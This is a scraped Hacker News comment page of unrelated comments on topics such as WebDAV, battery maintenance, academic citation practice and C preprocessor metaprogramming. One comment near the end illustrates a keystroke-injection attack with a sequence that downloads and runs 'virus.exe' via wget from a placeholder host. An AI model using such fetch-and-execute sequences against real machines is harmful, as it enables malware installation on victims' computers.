Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

The trouble is, you don't have enough clout to do a good job on this. Look at Alibaba. Here's a typical Alibaba customer profile:

    4.8/5 Satisfied
    113 reviews

    ≤2h average response time
    98.7% on-time delivery rate
    US $470,000+
    474 orders
Tracking interactions with employers like that would be a huge help. "Ghosting" should show up in employer stats.

Because it's an obvious insider and not a sophisticated trader.

"GNU grep added a warning to inform you of the deprecation which happened 28 years ago, but only to stderr, and still works like you expect", does to me.

Relevant, from 20 years ago, "Enhancing Server Availability and Security Through Failure-Oblivious Computing", Rinard et al.: https://people.csail.mit.edu/rinard/techreport/MIT-CSAIL-TR-...

From the abstract:

> Failure-oblivious computing "enables servers to execute through memory errors without memory corruption. Our safe compiler for C inserts checks that dynamically detect invalid memory accesses. Instead of terminating or throwing an exception, the generated code simply discards invalid writes and manufactures values to return for invalid reads, enabling the server to continue its normal execution path.

From the conclusion:

> Our results show that failure-oblivious computation enhances availability, resilience, and security by continuing to execute through memory errors while ensuring that such errors do not corrupt the address space or data structures of the computation. In many cases failure-oblivious computing can automatically convert unanticipated and dangerous inputs or data into anticipated error cases that the program is designed to handle correctly. The result is that the program survives the unanticipated situation, returns back into its normal operating envelope, and continues to satisfy the needs of its users.


<snip>random whacko comments</snip>

>Come back in 5 years time when the batteries are 10 years old and failing like the bridges and schools and universities.

This however is a valid point to make. In my experience with battery systems, regular maintenance and replacing failed units is one of the things that people are quick to not do on preventative schedule. Instead, they wait until the unit is completely dead and then gasp at the cost of battery replacement. Based on how companies like PG&E not do regular maintenance on their lines, it doesn't bode well for the batteries.


It sounds like you're talking about Qubes.

Yes. It became capital again in 1918 (Saint Petersburg had become capital in 1712).

Welcome to the brave new world these days:

1 - Very few people conduct "proper scholarship", and fail to trace ideas back to their original inception and cite them correctly. This happens time and again in deep learning, where 30+ year old ideas are claimed as "novel" over and over. Many times out of malice by the authors, sometimes out of ignorance.

2 - Peer review in many parts of the industry+research is a joke. Mostly shouldered by early graduate students who don't really know the field well and an incredibly noisy process.

3 - It is common practice now to dump out one's "kitchen sink" of ideas rather than properly refined stuff. Hence the increase in LinkedIn spam, blog spam, arXiv spam style of papers.


"Ferb, I know what we're gonna do today"

I use it all the time to mount my CopyParty instance. Works great!

Introduction paragraph:

Metalang99 is a firm foundation for writing reliable and maintainable metaprograms in pure C99. It is implemented as an interpreted FP language atop of preprocessor macros: just #include <metalang99.h> and you are ready to go. Metalang99 features algebraic data types, pattern matching, recursion, currying, and collections; in addition, it provides means for compile-time error reporting and debugging. With our built-in syntax checker, macro errors should be perfectly comprehensible, enabling you for convenient development.


Don’t do this in front of the team. This sort of message should be delivered privately.

Doubt this is the way to go anyway but it’s definitely not something to say during the meeting.


I thought the prospects for flow batteries were becoming fairly dire due to the decline in cost of Li-ion cells.

LFP promises better fire behavior than older Li-ion technologies, I think.


Just out of curiosity, do you have thoughts on what some of the most useful projects are to those in your position, that one could contribute to?

OP here. Appreciate the feedback - the login barrier is definitely something we will take on board. I think some level of identity authentication is a must to counter the scourge of bot traffic, but we will think of ways to be cleverer about this.

With regard to job posting accuracy - absolutely this is a problem. Normalising what different job descriptions actually _mean_ is one of the key challenges we want to solve.


Honestly, you come across as quite negative yourself.

There's a saying, "If everywhere you go smells like shit, maybe it’s time to check your shoes"


And smashing everything in Nuclear, whilst America turns to fossil fuels.

Much as I am against autocracy and oppression, china is doing very well at improving their energy sector.


wouldn't it be like a crime against the crown to not have a cheri like thing in arm?

See, your academic defense lacks any practicalism. I know how academics define it, that's why you barely cannot them use as is.

With some algos you can export the ordering tables trivially, but nobody does. Because someone else's problem.


Isn't that SMB, not webdav?

Unlike what the title of the post implies, I would say Wikipedia bears 0% of the blame for this issue.

I would put 50% of the blame on goggle, for offering up translations that are wholly or partially in error, without any indication such as a warning message to that effect.

Then I would assign 40% of the blame on LLM text generation based on models where the model creators performed no review of their training data.

The final 10% of blame goes to anyone who would post rubbish without first hand knowledge that at least the translation was correct.

Except for that final 10%, all of the blame goes to the profit motive. Foisting shit on the world for the sole purpose of profit.

And lets face it, this isn't exactly the first time marginalized people, or their languages, have suffered because of western capitalism...

p.s. fan-bois kool-aid drinkers, feel free to start your down-voting now...


The constant A/B tests in Google apps like the Play Store drives me nuts. Buttons constantly changing around which is equal to being gaslit because you are wondering whether you just misremembered where the button was.

> In fact, you're already using WebDAV and you just don't realize it.

Tailscale's drive share feature is implemented as a WebDAV share (connect to http://100.100.100.100:8080). You can also connect to Fastmail's file storage over WebDAV.

WebDAV is neat.


Thanks. (iPhone user though. I'll look for another solution. :-))

There is opportunity in the meta.

If you are leaving a comment it’s because someone didn’t learn how things should be from the tools in your codebase.

Naming style problem? Linting isn’t catching it.

Architecture violation? Your import linting isn’t catching it.

Duplication of a method that exists elsewhere? What tooling can you create in the LLM era - remembering you can ask agents to build scripts now - which can catch this for you the moment the PR goes up?


That’s a lot of confidence with a vanishingly small amount of evidence. I am constantly accused of being an AI for articles I blogged more than 20 years ago.

I use—still—em dashes whenever I feel like they are better than commas, parentheses or semicolons.

Because that’s what they are for, and this is English after all. Some people don’t approve, and I approve of their disapproval—it’s a free country and writing is a creative process.

What doesn’t contribute are comments that discredit and disparage without adding anything to the conversation.


That last part creates a chicken and egg problem. You can argue about it but I will bet it will never get traction if there is no basis to start from.

Wow, that guy is a piece of work.

https://en.wikipedia.org/wiki/Harold_von_Braunhut


I doubt that you need any of that or it has any use for dealing with kids ages 3-6. Every granny and auntie knew how to do it since time immemorial. Just let them play, go out in the yard, chase the ants, dig some holes in the mud, run around, play with a ball. Eat and take a nap, look at picture books, have the teacher tell a story while the kids sit around her etc.

What matters is to have low-stress, motivated teachers with good personalities, empathy and intelligence. And similarly a filtered peer group. All the rest is window dressing.


Of course it can. You can send keystrokes something like <Win>+R, cmd, wget example.com/virus.exe <Enter> virus.exe <Enter> and Windows computer will download and execute this binary. That's example for Windows, but there's nothing preventing you from using similar technique for macOS.

The only security barrier that macOS implements against this kind of attack is, that you must manually confirm after you connected that "keyboard", for system to enable it.


Consider applying for YC's Winter 2026 batch! Applications are open till Nov 10

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: